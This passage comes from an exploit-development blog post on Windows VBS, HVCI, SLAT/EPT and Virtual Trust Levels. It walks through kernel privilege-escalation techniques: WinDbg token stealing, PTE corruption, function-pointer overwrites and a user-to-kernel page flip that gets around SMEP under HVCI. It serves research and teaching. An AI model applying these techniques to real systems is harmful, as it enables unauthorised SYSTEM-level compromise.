I hope the reader found at least this blog to not be so boring, even if it wasn’t informational to you. As always, if you have feedback please don’t hesitate to reach out to me. I would also like to thank Andrea Allievi for answering a few of my questions about this blog post! I did not ask Andrea to review every single aspect of this post (so any errors in this post are completely mine). If, again, there are issues identified please reach out to me so I can make edits!

Peace, love, and positivity!

Before yesterdayVulnerabily Research

Exploit Development: No Code Execution? No Problem! Living The Age of VBS, HVCI, and Kernel CFG

23 May 2022 at 00:00


I firmly believe there is nothing in life that is more satisfying than wielding the ability to execute unsigned-shellcode. Forcing an application to execute some kind of code the developer of the vulnerable application never intended is what first got me hooked on memory corruption. However, as we saw in my last blog series on browser exploitation, this is already something that, if possible, requires an expensive exploit - in terms of cost to develop. With the advent of Arbitrary Code Guard, and Code Integrity Guard, executing unsigned code within a popular user-mode exploitation β€œtarget”, such as a browser, is essentially impossible when these mitigations are enforced properly (and without an existing vulnerability).

Another popular target for exploit writers is the Windows kernel. Just like with user-mode targets, such as Microsoft Edge (pre-Chromium), Microsoft has invested extensively into preventing execution of unsigned, attacker-supplied code in the kernel. This is why Hypervisor-Protected Code Integrity (HVCI) is sometimes called β€œthe ACG of kernel mode”. HVCI is a mitigation, as the name insinuates, that is provided by the Windows hypervisor - Hyper-V.

HVCI is a part of a suite of hypervisor-provided security features known as Virtualization-Based Security (VBS). HVCI uses some of the same technologies employed for virtualization in order to mitigate the ability to execute shellcode/unsigned-code within the Windows kernel. It is worth noting that VBS isn’t HVCI. HVCI is a feature under the umbrella of all that VBS offers (Credential Guard, etc.).

How can exploit writers deal with this β€œshellcode-less” era? Let’s start by taking a look into how a typical kernel-mode exploit may work and then examine how HVCI affects that mission statement.

β€œWe guarantee an elevated process, or your money back!” - The Kernel Exploit Committee’s Mission Statement

Kernel exploits are (usually) locally-executed for local privilege escalation (LPE). Remotely-detonated kernel exploits over a protocol handled in the kernel, such as SMB, are usually more rare - so we will focus on local exploitation.

When locally-executed kernel exploits are exploited, they usually follow the below process (key word here - usually):

  1. The exploit (which usually is a medium-integrity process if executed locally) uses a kernel vulnerability to read and write kernel memory.
  2. The exploit uses the ability to read/write to overwrite a function pointer in kernel-mode (or finds some other way) to force the kernel to redirect execution into attacker-controlled memory.
  3. The attacker-controlled memory contains shellcode.
  4. The attacker-supplied shellcode executes. The shellcode could be used to arbitrarily call kernel-mode APIs, further corrupt kernel-mode memory, or perform token stealing in order to escalate to NT AUTHORITY\SYSTEM.

Since token stealing is extremely prevalent, let’s focus on it.

We can quickly perform token stealing using WinDbg. If we open up an instance of cmd.exe, we can use the whoami command to understand which user this Command Prompt is running in context of.

Using WinDbg, in a kernel-mode debugging session, we then can locate where in the EPROCESS structure the Token member is, using the dt command. Then, using the WinDbg Debugger Object Model, we then can leverage the following commands to locate the cmd.exe EPROCESS object, the System process EPROCESS object, and their Token objects.

dx -g @$cursession.Processes.Where(p => p.Name == "System").Select(p => new { Name = p.Name, EPROCESS = &p.KernelObject, Token = p.KernelObject.Token.Object})

dx -g @$cursession.Processes.Where(p => p.Name == "cmd.exe").Select(p => new { Name = p.Name, EPROCESS = &p.KernelObject, Token = p.KernelObject.Token.Object})

The above commands will:

  1. Enumerate all of the current session’s active processes and filter out processes named System (or cmd.exe in the second command)
  2. View the name of the process, the address of the corresponding EPROCESS object, and the Token object

Then, using the ep command to overwrite a pointer, we can overwrite the cmd.exe EPROCESS.Token object with the System EPROCESS.Token object - which elevates cmd.exe to NT AUTHORITY\SYSTEM privileges.

It is truly a story old as time - and this is what most kernel-mode exploit authors attempt to do. This can usually be achieved through shellcode, which usually looks something like the image below.

However, with the advent of HVCI - many exploit authors have moved to data-only attacks, as HVCI prevents unsigned-code execution, like shellcode, from running (we will examine why shortly). These so-called β€œdata-only attacks” may work something like the following, in order to achieve the same thing (token stealing):

  1. NtQuerySystemInformation allows a medium-integrity process to leak any EPROCESS object. Using this function, an adversary can locate the EPROCESS object of the exploiting process and the System process.
  2. Using a kernel-mode arbitrary write primitive, an adversary can then copy the token of the System process over the exploiting process, just like before when we manually performed this in WinDbg, simply using the write primitive.

This is all fine and well - but the issue resides in the fact an adversary would be limited to hot-swapping tokens. The beauty of detonating unsigned code is the extensibility to not only perform token stealing, but to also invoke arbitrary kernel-mode APIs as well. Most exploit writers sell themselves short (myself included) by stopping at token stealing. Depending on the use case, β€œvanilla” escalation to NT AUTHORITY\SYSTEM privileges may not be what a sophisticated adversary wants to do with kernel-mode code execution.

A much more powerful primitive, besides being limited to only token stealing, would be if we had the ability to turn our arbitrary read/write primitive into the ability to call any kernel-mode API of our choosing! This could allow us to allocate pool memory, unload a driver, and much more - with the only caveat being that we stay β€œHVCI compliant”. Let’s focus on that β€œHVCI compliance” now to see how it affects our exploitation.

Note that the next three sections contain an explanation of some basic virtualization concepts, along with VBS/HVCI. If you are familiar, feel free to skip to the From Read/Write To Arbitrary Kernel-Mode Function Invocation section of this blog post to go straight to exploitation.

Hypervisor-Protected Code Integrity (HVCI) - What is it?

HVCI, at a high level, is a technology on Windows systems that prevents attackers from executing unsigned-code in the Windows kernel by essentially preventing readable, writable, and executable memory (RWX) in kernel mode. If an attacker cannot write to an executable code page - they cannot place their shellcode in such pages. On top of that, if attackers cannot force data pages (which are writable) to become code pages - said pages which hold the malicious shellcode can never be executed.

How is this manifested? HVCI leverages existing virtualization capabilities provided by the CPU and the Hyper-V hypervisor. If we want to truly understand the power of HVCI it is first worth taking a look at some of the virtualization technologies that allow HVCI to achieve its goals.

Hyper-V 101

Before prefacing this section (and the next two sections), all information provided can be found within Windows Internals 7th Edition: Part 2, Intel 64 and IA-32 Architectures Software Manual, Combined Volumes, and Hypervisor Top Level Functional Specification.

Hyper-V is Microsoft’s hypervisor. Hyper-V uses partitions for virtualization purposes. The host operating system is the root partition and child partitions are partitions that are allocated to host a virtual machine. When you create a Hyper-V virtual machine, you are allocating some system resources to create a child partition for the VM. This includes its own physical address space, virtual processors, virtual hard disk, etc. Creating a child partition creates a boundary between the root and child partition(s) - where the child partition is placed in its own address space, and is isolated. This means one virtual machine can’t β€œtouch” other virtual machines, or the host, as the virtual machines are isolated in their own address space.

Among the technologies that help augment this isolation is Second Layer Address Translation, or SLAT. SLAT is what actually allows each VM to run in its own address space in the eyes of the hypervisor. Intel’s implementation of SLAT is known as Extended Page Tables, or EPT.

At a basic level, SLAT (EPT) allows the hypervisor to create an additional translation of memory - giving the hypervisor power to delegate memory how it sees fit.

When a virtual machine needs to access physical memory (the virtual machine could have accessed virtual memory within the VM which then was translated into physical memory under the hood), with EPT enabled, the hypervisor will tell the CPU to essentially β€œintercept” this request. The CPU will translate the memory the virtual machine is trying to access into actual physical memory.

The virtual machine doesn’t know the layout of the physical memory of the host OS, nor does it β€œsee” the actual pages. The virtual machine operates on memory identically to how a normal system would - translating virtual addresses to physical addresses. However, behind the scenes, there is another technology (SLAT) which facilitates the process of taking the physical address the virtual machine thinks it is accessing and translating said physical memory into the actual physical memory on the physical computer - with the VM just operating as normal. Since the hypervisor, with SLAT enabled, is aware of both the virtual machine’s β€œview” of memory and the physical memory on the host - it can act as arbitrator to translate the memory the VM is accessing into the actual physical memory on the computer (we will come to a visual shortly if this is a bit confusing).

It is worth investigating why the hypervisor needs to perform this additional layer of translation in order to not only understand basic virtualization concepts - but to see how HVCI leverages SLAT for security purposes.

As an example - let’s say a virtual machine tries to access the virtual address 0x1ad0000 within the VM - which (for argument’s sake) corresponds to the physical memory address 0x1000 in the VM. Right off the bat we have to consider that all of this is happening within a virtual machine - which runs on the physical computer in a pre-defined location in memory on that physical computer (a child partition in a Hyper-V setup).

The VM can only access its own β€œview” of what it thinks the physical address 0x1000 is. The physical location in memory (since VMs run on a physical computer, they use the physical computer’s memory) where the VM is accessing (what it thinks is 0x1000) is likely not going to be located at 0x1000 on the physical computer itself. This can be seen below (please note that the below is just a visual representation, and may not represent things like memory fragmentation, etc.).

In the above image, the physical address of the VM located at 0x1000 is stored at the physical address of 0x4000 on the physical computer. So when the VM needs to access what it thinks is 0x1000, it actually needs to access the contents of 0x4000 on the physical computer.

This creates an issue, as the VM not only needs to compensate for β€œnormal” paging to come to the conclusion that the virtual address in the VM, 0x1ad0000, corresponds to the physical address 0x1000 - but something needs to compensate for the fact that when the VM tries to access the physical address 0x1000 that the memory contents of 0x1000 (in context of the VM) are actually stored somewhere in the memory of the physical computer the VM is running on (in this case 0x4000).

To address this, the following happens: the VM walks the paging structures, starting with the base paging structure, PML4, in the CR3 CPU register within the VM (as is typical in β€œnormal” memory access). Through paging, the VM would eventually come to the conclusion that the virtual address 0x1ad0000 corresponds to the physical address 0x1000. However, we know this isn’t the end of the conversion because although 0x1000 exists in context of the VM as 0x1000, that memory stored there is stored somewhere else in the physical memory of the physical computer (in this case 0x4000).

With SLAT enabled the physical address in the VM (0x1000) is treated as a guest physical address, or GPA, by the hypervisor. Virtual machines emit GPAs, which then are converted into a system physical address, or SPA, by the physical CPU. SPAs refer to the actual physical memory on the physical computer the VM(s) is/are running on.

The way this is done is through another set of paging structures called extended page tables (EPTs). The base paging structure for the extended page tables is known as the EPT PML4 structure - similarly to a β€œtraditional” PML4 structure. As we know, the PML4 structure is used to further identify the other paging structures - which eventually lead to a 4KB-aligned physical page (on a typical Windows system). The same is true for the EPT PML4 - but instead of being used to convert a virtual address into a physical one, the EPT PML4 is the base paging structure used to map a VM-emitted guest physical address into a system physical address.

The EPT PML4 structure is referenced by a pointer known as the Extended Page Table Pointer, or EPTP. An EPTP is stored in a per-VCPU (virtual processor) structure called the Virtual Machine Control Structure, or VMCS. The VMCS holds various information, including state information about a VM and the host. The EPTP can be used to start the process of converting GPAs to SPAs for a given virtual machine. Each virtual machine has an associated EPTP.

To map guest physical addresses (GPAs) to system physical addresses (SPAs), the CPU β€œintercepts” a GPA emitted from a virtual machine. The CPU then takes the guest physical address (GPA) and uses the extended page table pointer (EPTP) from the VMCS structure for the virtual CPU the virtual machine is running under, and it uses the extended page tables to map the GPA to a system physical address (SPA).

The above process allows the hypervisor to map what physical memory the guest VM is actually trying to access, due to the fact the VM only has access to its own allocated address space (like when a child partition is created for the VM to run in).

The page table entries within the extended page tables are known as extended page table entries, or EPTEs. These act essentially the same as β€œtraditional” PTEs - except for the fact that EPTEs are used to translate a GPA into an SPA - instead of translating a virtual address into a physical one (along with some other nuances). What this also means is that EPTEs are only used to describe physical memory (guest physical addresses and system physical addresses).

The reason why EPTEs only describe physical memory is pretty straightforward. The β€œnormal” page table entries (PTEs) are already used to map virtual memory to physical memory - and they are also used to describe virtual memory. Think about a normal PTE structure - it stores some information which describes a given virtual page (readable, writable, etc.) and it also contains a page frame number (PFN) which, when multiplied by the size of a page (usually 0x1000), gives us the physical page backing the virtual memory. This means we already have a mechanism to map virtual memory to physical memory - so the EPTEs are used for GPAs and SPAs (physical memory).

Another interesting side effect of only applying EPTEs to physical memory is the fact that physical memory trumps virtual memory (we will talk more about how this affects traditional PTEs later and the level of enforcement on memory PTEs have when coupled with EPTEs).

For instance, if a given virtual page is marked as readable/writable/executable in its PTE - but the physical page backing that virtual page is described as only readable - any attempt to execute and/or write to the page will result in an access violation. Since the EPTEs describe physical memory and are managed by the hypervisor, the hypervisor can enforce its β€œview” of memory leveraging EPTEs - meaning that the hypervisor ultimately can decide how a given page of RAM should be defined. This is the key tenet of HVCI.

Think back to our virtual machine to physical machine example. The VM has its own view of memory, but ultimately the hypervisor had the β€œsupreme” view of memory. It understands where the VM thinks it is accessing and it can correlate that to the actual place in memory on the physical computer. In other words, the hypervisor contains the β€œultimate” view of memory.

Now, I am fully aware a lot of information has been mentioned above. At a high level, we should walk away with the following knowledge:

  1. It is possible to isolate a virtual machine in its own address space.
  2. It is possible to abstract the physical memory that truly exists on the host operating system away from the virtual machine.
  3. Physical memory trumps virtual memory (if virtual memory is read/write and the physical memory is read-only, any write to the region will cause an access violation).
  4. EPTEs facilitate the β€œsupreme” view of memory, and have the β€œfinal say”.

The above concepts are the basis for HVCI (which we will expand upon in the next section).

Before leaving this section of the blog post - we should recall what was said earlier about HVCI:

HVCI is a feature under the umbrella of all that VBS offers (Credential Guard, etc.).

What this means is that Virtualization-Based Security is responsible for enabling HVCI. Knowing that VBS is responsible for enabling HVCI (should it be enabled on the host operating system which, as of Windows 11 and Windows 10 β€œSecured Core” PCs, it is by default), the last thing we need to look at is how VBS takes advantage of all of these virtualization technologies we have touched on in order to instrument HVCI.

Virtualization-Based Security

With Virtualization-Based Security enabled, the Windows operating system runs in a β€œvirtual machine”, of sorts. Although Windows isn’t placed into a child partition, meaning it doesn’t have a VHD, or virtual hard disk - the hypervisor, at boot, makes use of all of the aforementioned principles and technologies to isolate the β€œstandard” Windows kernel (e.g. what the end-user interfaces with) in its own region, similarly to how a VM is isolated. This isolation is manifest through Virtual Trust Levels, or VTLs. Currently there are two Virtual Trust Levels - VTL 1, which hosts the β€œsecure kernel” and VTL 0, which hosts the β€œnormal kernel” - with the β€œnormal kernel” being what end-users interact with. Both of these VTLs are located in the root partition. You can think of these two VTLs as β€œisolated virtual machines”.

VTLs, similarly to virtual machines, provide isolation between the two environments (in this case between the β€œsecure kernel” and the β€œnormal kernel”). Microsoft considers the β€œsecure” environment, VTL 1, to be a β€œmore privileged entity” than VTL 0 - with VTL 0 being what a normal user interfaces with.

The goal of the VTLs is to create a higher security boundary (VTL 1) where if a normal user exploits a vulnerability in the kernel of VTL 0 (where all users are executing, only Microsoft is allowed in VTL 1), they are limited to only VTL 0. Historically, however, if a user compromised the Windows kernel, there was nothing else to protect the integrity of the system - as the kernel was the highest security boundary. Now, since VTL 1 is of a β€œhigher boundary” than VTL 0 - even if a user exploits the kernel in VTL 0, there is still a component of the system that is totally isolated (VTL 1) from where the malicious user is executing (VTL 0).

It is crucial to remember that although VTL 0 is a β€œlower security boundary” than VTL 1 - VTL 0 doesn’t β€œlive” in VTL 1. VTL 0 and VTL 1 are two separate entities - just as two virtual machines are two separate entities. On the same note - it is also crucial to remember that VBS doesn’t actually create virtual machines - VBS leverages the virtualization technologies that a hypervisor may employ for virtual machines in order to isolate VTL 0 and VTL 1. Microsoft instruments these virtualization technologies in such a way that, although VTL 1 and VTL 0 are separated like virtual machines, VTL 1 is allowed to impose its β€œwill” on VTL 0. When the system boots, and the β€œsecure” and β€œnormal” kernels are loaded - VTL 1 is then allowed to β€œask” the hypervisor, through a mechanism called a hypercall (more on this later in the blog post), if it can β€œsecurely configure” VTL 0 (which is what the normal user will be interfacing with) in a way it sees fit, when it comes to HVCI. VTL 1 can impose its will on VTL 0 - but it goes through the hypervisor to do this. To summarize - VTL 1 isn’t the hypervisor, and VTL 0 doesn’t live in VTL 1. VTL 1 works with the hypervisor to configure VTL 0 - and all three are their own separate entities. The following image is from Windows Internals, Part 1, 7th Edition - which visualizes this concept.

We’ve talked a lot now on SLAT and VTLs - let’s see how these technologies are both used to enforce HVCI.

After the β€œsecure” and β€œnormal” kernels are loaded - execution eventually redirects to the entry point of the β€œsecure” kernel, in VTL 1. The secure kernel will set up SLAT/EPT, by asking the hypervisor to create a series of extended page table entries (EPTEs) for VTL 0 through the hypercall mechanism (more on this later). We can think of this as if we are treating VTL 0 as β€œthe guest virtual machine” - just like how the hypervisor would treat a β€œnormal” virtual machine. The hypervisor would set up the necessary EPTEs that would be used to map the guest physical addresses generated from a virtual machine into actual physical memory (system physical addresses). However, let’s recall the architecture of the root partition when VTLs are involved.

As we can see, both VTL 1 and VTL 0 reside within the root partition. This means that, theoretically, both VTL 1 and VTL 0 have access to the physical memory on the physical computer. At this point you may be wondering - if both VTL 1 and VTL 0 reside within the same partition - how is there any separation of address space/privileges? VTL 0 and VTL 1 seem to share the same physical address space. This is where virtualization comes into play!

Microsoft leverages all of the virtualization concepts we have previously talked about, and essentially places VTL 1 and VTL 0 into β€œVMs” (logically speaking) in which VTL 0 is isolated from VTL 1, and VTL 1 has control over VTL 0 - with this architecture being the basis of HVCI (more on the technical details shortly).

If we treat VTL 0 as β€œthe guest” we then can use the hypervisor and CPU to translate addresses requested from VTL 0 (the hypervisor β€œmanages” the EPTEs but the CPU performs the actual translation). Since GPAs are β€œintercepted”, in order for them to be converted into SPAs, this provides a mechanism (via SLAT) to β€œintercept” or β€œgate” any memory access stemming from VTL 0.

Here is where things get very interesting. Generally speaking, the GPAs emitted by VTL 0 actually map to the same physical memory on the system.

Let’s say VTL 0 requests to access the physical address 0x1000, as a result of a virtual address within VTL 0 being translated to the physical address 0x1000. The address of the GPA, which is 0x1000, is still located at an SPA of 0x1000. This is due to the fact that virtual machines, in Hyper-V, are confined to their respective partitions - and since VTL 1 and VTL 0 live in the same partition (the root), they β€œshare” the same physical memory address space (which is the actual physical memory on the system).

So, since EPT (with HVCI enabled) isn’t used to β€œfind” the physical address a GPA corresponds to on the system - due to the GPAs and SPAs mapping to the same physical address - what on earth could they be used for?

Instead of using extended page table entries to traverse the extended page tables in order to map one GPA to another SPA, the EPTEs are instead used to create a β€œsecond view” of memory - with this view describing all of RAM as either readable and writable (RW) but not executable - or readable and executable - but not writable, when dealing with HVCI. This ensures that no pages exist in the kernel which are writable and executable at the same time - which is a requirement for unsigned-code!

Recall that EPTEs are used to describe each physical page. Just as a virtual machine has its own view of memory, VTL 0 also has its own view of memory, which it manages through standard, normal PTEs. The key to remember, however, is that at boot - code in VTL 1 works with the hypervisor to create EPTEs which have the true definition of memory - while the OS in VTL 0 only has its view of memory. The hypervisor’s view of memory is β€œsupreme” - as the hypervisor is a β€œhigher security boundary” than the kernel, which historically managed memory. This, as mentioned, essentially creates two β€œmappings” of the actual physical memory on the system - one is managed by the Windows kernel in VTL 0, through traditional page table entries, and the other is managed by the hypervisor using extended page table entries.

Since we know EPTEs are used to describe physical memory, this can be used to override any protections that are set by the β€œtraditional” PTEs themselves in VTL 0. And since the hypervisor’s view of virtual memory trumps the OS (in VTL 0) view - HVCI leverages the fact that since the EPTEs are managed by a more β€œtrusted” boundary, the hypervisor, they are immutable in context of VTL 0 - where the normal users live.

As an example, let’s say you use the !pte command in WinDbg to view the PTE for a given virtual memory address in VTL 0, and WinDbg says that page is readable, writable, and executable. However, the EPTE (which is not transparent to VTL 0) may actually describe the physical page backing that virtual address as only readable. This means the page would be only readable - even though the PTE in VTL 0 says otherwise!

HVCI leverages SLAT/EPT in order to ensure that there are no pages in VTL 0 which can be abused to execute unsigned-code (by enforcing the aforementioned principles on RWX memory). It does this by guaranteeing that code pages never become writable - or that data pages never become executable. You can think of EPTEs being used (with HVCI) to basically create an additional β€œmapping” of memory, with all memory being either RW- or R-X, and with this β€œmapping” of memory trumping the β€œnormal” enforcement of memory through normal PTEs. The EPTE β€œview” of memory is the β€œroot of trust” now. These EPTEs are managed by the hypervisor, which VTL 0 cannot touch.

We know now that the EPTEs have the β€œtrue” definition of memory - so a logical question would now be β€œhow does the request, from the OS, to setup an EPTE work if the EPTEs are managed by the hypervisor?” As an example, let’s examine how boot-loaded drivers have their memory protected by HVCI (the process of loading runtime drivers is different - but the mechanism (which is a hypercall - more on this later), used to apply SLAT page protections remains the same for runtime drivers and boot-loaded drivers).

We know that VTL 1 performs the request for the configuration of EPTEs in order to configure VTL 0 in accordance with HVCI (no memory that is writable and executable). This means that securekernel.exe - which is the β€œsecure kernel” running in VTL 1 - must be responsible for this. Cross referencing the VSM startup section of Windows Internals, we can observe the following:

… Starts the VTL secure memory manager, which creates the boot table mapping and maps the boot loader’s memory in VTL 1, creates the secure PFN database and system hyperspace, initializes the secure memory pool support, and reads the VTL 0 loader block to copy the module descriptors for the Secure Kernel’s imported images (Skci.dll, Cnf.sys, and Vmsvcext.sys). It finally walks the NT loaded module list to establish each driver state, creating a NAR (normal address range) data structure for each one and compiling an Normal Table Entry (NTE) for every page composing the boot driver’s sections. FURTHERMORE, THE SECURE MEMORY MANAGER INITIALIZATION FUNCTION APPLIES THE CORRECT VTL 0 SLAT PROTECTION TO EACH DRIVER’S SECTIONS.

Let’s start with the β€œsecure memory manager initialization function” - which is securekernel!SkmmInitSystem.

securekernel!SkmmInitSystem performs a multitude of things, as seen in the quote from Windows Internals. Towards the end of the function, the memory manager initialization function calls securekernel!SkmiConfigureBootDriverPages - which eventually β€œapplies the correct VTL 0 SLAT protection to each [boot-loaded] driver’s sections”.

There are a few code paths which can be taken within securekernel!SkmiConfigureBootDriverPages to configure the VTL 0 SLAT protection for HVCI - but the overall β€œgist” is:

  1. Check if HVCI is enabled (via SkmiFlags).
  2. If HVCI is enabled, apply the appropriate protection.

As mentioned in Windows Internals, each of the boot-loaded drivers has each section (.text, etc.) protected by HVCI. This is done by iterating through each section of the boot-loaded drivers and applying the correct VTL 0 permissions. In the specific code path shown below, this is done via the function securekernel!SkmiProtectSinglePage.

Notice that securekernel!SkmiProtectSinglePage has its second argument as 0x102. Examining securekernel!SkmiProtectSinglePage a bit further, we can see that this function (in the particular manner securekernel!SkmiProtectSinglePage is called within securekernel!SkmiConfigureBootDriverPages) will call securekernel!ShvlProtectContiguousPages under the hood.

securekernel!ShvlProtectContiguousPages is called because if the if ((a2 & 0x100) != 0) check is satisfied in the above function call (and it will be satisfied, because the provided argument was 0x102 - which, when bitwise AND’d with 0x100, does not equal 0), the function that will be called is securekernel!ShvlProtectContiguousPages. The last argument provided to securekernel!ShvlProtectContiguousPages is the appropriate protection mask for the VTL 0 page. Remember - this code is executing in VTL 1, and VTL 1 is allowed to configure the β€œtrue” memory permission (via EPTEs) VTL 0 as it sees fit.

securekernel!ShvlProtectContiguousPages, under the hood, invokes a function called securekernel!ShvlpProtectPages - essentially acting as a β€œwrapper”.

Looking deeper into securekernel!ShvlpProtectPages, we notice some interesting functions with the word β€œhypercall” in them.

Grabbing one of these functions (securekernel!ShvlpInitiateVariableHypercall will be used, as we will see later), we can see it is a wrapper for securekernel!HvcallpInitiateHypercall - which ends up invoking securekernel!HvcallCodeVa.

I won’t get into the internals of this function - but securekernel!HvcallCodeVa emits a vmcall assembly instruction - which is like a β€œHyper-V syscall”, called a β€œhypercall”. This instruction will hand execution off to the hypervisor. Hypercalls can be made by both VTL 1 and VTL 0.

When a hypercall is made, the β€œhypercall call code” (similar to a syscall ID) is placed into RCX in the lower 16 bits. Additional values are appended in the RCX register, as defined by the Hypervisor Top-Level Functional Specification, known as the β€œhypercall input value”.

Each hypercall returns a β€œhypercall status code” - which is a 16-byte value (whereas NTSTATUS codes are 32-bit). For instance, a code of HV_STATUS_SUCCESS means that the hypercall completed successfully.

Specifically, in our case, the hypercall call code associated with securekernel!ShvlpProtectPages is 0xC.

If we cross reference this hypercall call code with the the Appendix A: Hypercall Code Reference of the TLFS - we can see that 0xC corresponds with the HvCallModifyVtlProtectionMask - which makes sense based on the operation we are trying to perform. This hypercall will β€œconfigure” an immutable memory protection (SLAT protection) on the in-scope page (in our scenario, a page within one of the boot-loaded driver’s sections), in context of VTL 0.

We can also infer, based on the above image, that this isn’t a fast call, but a rep (repeat) call. Repeat hypercalls are broken up into a β€œseries” of hypercalls because hypercalls only have a 50 microsecond interval to finish before other components (interrupts for instance) need to be serviced. Repeated hypercalls will eventually be finished when the thread executing the hypercall resumes.

To summarize this section - with HVCI there are two views of memory - one managed by the hypervisor, and one managed by the Windows kernel through PTEs. Not only does the hypervisor’s view of memory trump the Windows kernel view of memory - but the hypervisor’s view of memory is immutable from the β€œnormal” Windows kernel. An attacker, even with a kernel-mode write primitive, cannot modify the permissions of a page through PTE manipulation anymore.

Let’s actually get into our exploitation to test these theories out.

HVCI - Exploitation Edition

As I have blogged about before, a common way kernel-mode exploits manifest themselves is the following (leveraging an arbitrary read/write primitive):

  1. Write a kernel-mode payload to kernel mode (could be KUSER_SHARED_DATA) or user mode.
  2. Locate the page table entry that corresponds to that page the payload resides.
  3. Corrupt that page table entry to mark the page as KRWX (kernel, read, write, and execute).
  4. Overwrite a function pointer (nt!HalDispatchTable + 0x8 is a common method) with the address of your payload and trigger the function pointer to gain code execution.

HVCI is able to combat this because of the fact that a PTE is β€œno longer the source of truth” for what permissions that memory page actually has. Let’s look at this in detail.

As we know, KUSER_SHARED_DATA + 0x800 is a common code cave abused by adversaries (although this is not possible in future builds of Windows 11). Let’s see if we can abuse it with HVCI enabled.

Note that using Hyper-V it is possible to enable HVCI while also disabling Secure Boot. Secure Boot must be disabled for kernel debugging. After disabling Secure Boot we can then enable HVCI, which can be found in the Windows Security settings under Core Isolation -> Memory Integrity. Memory Integrity is HVCI.

Let’s then manually corrupt the PTE of 0xFFFFF78000000000 + 0x800 to make this page readable/writable/executable (RWX).

0xFFFFF78000000000 + 0x800 should now be fully readable, writable, and executable. This page is empty (doesn’t contain any code) so let’s write some NOP instructions to this page as a proof-of-concept. When 0xFFFFF78000000000 + 0x800 is executed, the NOP instructions should be dispatched.

We then can load this address into RIP to queue it for execution, which should execute our NOP instructions.

The expected outcome, however, is not what we intend. As we can see, executing the NOPs crashes the system. This is even in the case of us explicitly marking the page as KRWX. Why is this? This is due to HVCI! Since HVCI doesn’t allow RAM to be RWX, the physical page backing KUSER_SHARED_DATA + 0x800 is β€œmanaged” by the EPTE (meaning the EPTEs’ definition of the physical page is the β€œroot of trust”). Since the EPTE is managed by the hypervisor - the original memory allocation of read/write in KUSER_SHARED_DATA + 0x800 is what this page is - even though we marked the PTE (in VTL 0) as KRWX! Remember - EPTEs are β€œthe root of trust” in this case - and they enforce their permissions on the page - regardless of what the PTE says. The result is us trying to execute code which looks executable in the eyes of the OS (in VTL 0), because the PTE says so - but in fact, the page is not executable. Therefore we get an access violation due to the fact we are attempting to execute memory which isn’t actually executable! This is because the hypervisor’s β€œview” of memory, managed by the EPTEs, trumps the view our VTL 0 operating system has - which instead relies on β€œtraditional” PTEs.

This is all fine and dandy, but what about exploits that allocate RWX user-mode code, write shellcode that will be executed in the kernel into the user-mode allocation, and then use a kernel read/write primitive, similarly to the first example in this blog post to corrupt the PTE of the user-mode page to mark it as a kernel-mode page? If this were allowed to happen - as we are only manipulating the U/S bit and not manipulating the executable bits (NX) - this would violate HVCI in a severe way - as we now have fully-executable code in the kernel that we can control the contents of.

Practically, an attacker would start by allocating some user-mode memory (via VirtualAlloc or similar APIs/C-runtime functions). The attacker marks this page as readable/writable/executable. The attacker would then write some shellcode into this allocation (usually kernel exploits use token-stealing shellcode, but other times an attacker may want to use something else). The key here to remember is that the memory is currently sitting in user mode.

This allocation is located at 0x1ad0000 in our example (U in the PTE stands for a user-mode page).

Using a kernel vulnerability, an attacker would arbitrarily read memory in kernel mode in order to resolve the PTE that corresponds to this user-mode shellcode located at 0x1ad0000. Using the kernel vulnerability, an attacker could corrupt the PTE bits to tell the memory manager that this page is now a kernel-mode page (represented by the letter K).

Lastly, using the vulnerability again, the attacker overwrites a function pointer in kernel mode that, when executed, will actually execute our user-mode code.

Now you may be thinking - β€œConnor, you just told me that the kernel doesn’t allow RWX memory with HVCI enabled? You just executed RWX memory in the kernel! Explain yourself!”.

Let’s first start off by understanding that all user-mode pages are represented as RWX within the EPTEs - even with HVCI enabled. After all, HVCI is there to prevent unsigned-code from being executed in the kernel. You may also be thinking - β€œConnor, doesn’t that violate the basic principle of DEP in user-mode?”. In this case, no it doesn’t. Recall that earlier in this blog post we said the following:

(we will talk more about how this affects traditional PTEs later and the level of enforcement on memory PTEs have when coupled with EPTEs).

Let’s talk about that now.

Remember that HVCI is used to ensure there is no kernel-mode RWX memory. So, even though the EPTE says a user-mode page is RWX, the PTE (for a user-mode page) will enforce DEP by marking data pages as non-executable. This non-executable permission on the PTE will enforce the NX permission. Recall that we said EPTEs can β€œtrump” PTEs - we didn’t say they always do this in 100 percent of cases. A case where the PTE is used, instead needing to β€œgo” to the EPTE, would be DEP. If a given page is already marked as non-executable in the PTE, why would the EPTE need to be checked? The PTE itself would prevent execution of code in this page, it would be redundant to check it again in the EPTE. Instead, an example of when the EPTE is checked if a PTE is marked as executable. The EPTE is checked to ensure that page is actually executable. The PTE is the first line of defense. If something β€œgets around the PTE” (e.g. a page is executable) the CPU will check the EPTE to ensure the page actually is executable. This is why the EPTEs mark all user-mode pages as RWX, because the PTE itself already enforces DEP for the user-mode address space.

The EPTE structure doesn’t have a U/S bit and, therefore, relies on the current privilege level (CPL) of a processor executing code to enforce if code should be executed as kernel mode or user mode. The CPU, in this case, will rely on the standard page table entries to determine what the CPL of the code segment should be when code is executing - meaning an attacker can take advantage of the fact that user-mode pages are marked as RWX, by default, in the EPTEs, and then flip the U/S bit to a supervisor (kernel) page. The CPU will then execute the code as kernel mode.

This means that the only thing to enforce the kernel/user boundary (for code execution purposes) is the CPU (via SMEP). SMEP, as we know, essentially doesn’t allow user-mode code execution from the kernel. So, to get around this, we can use PTE corruption (as shown in my previously-linked blog on PTE overwrites) to mark a user-mode page as a kernel-mode one. When the kernel now goes to execute our shellcode it will β€œrecognize” the shellcode page (technically in the user-mode address space) as a kernel-mode page. EPTEs don’t have a β€œbit” to define if a given page is kernel or user, so it relies on the already existing SMEP technology to enforce this - which uses β€œnormal” PTEs to determine if a given page is a kernel-mode or user-mode page. Since the EPTEs are only looking at the executable permissions, and not a U/S bit - this means the β€œold” primitive of β€œtricking” the CPU into executing a β€œfake” kernel-mode page exists - as EPTEs still rely on the CPU to enforce this boundary. So when a given user-mode page is being executed, the EPTEs assume this is a user-mode page - and will gladly execute it. The CPU, however, has it’s code segment executing in ring 0 (kernel mode) because the PTE of the page was corrupted to mark it as a β€œkernel-mode” page (a la the β€œU/S SMEP bypass”).

To compensate for this, Intel has a hardware solution known as Mode-Based Execution Control, or MBEC. For CPUs that cannot support MBEC Microsoft has its own emulation of MBEC called Restricted User Mode, or RUM.

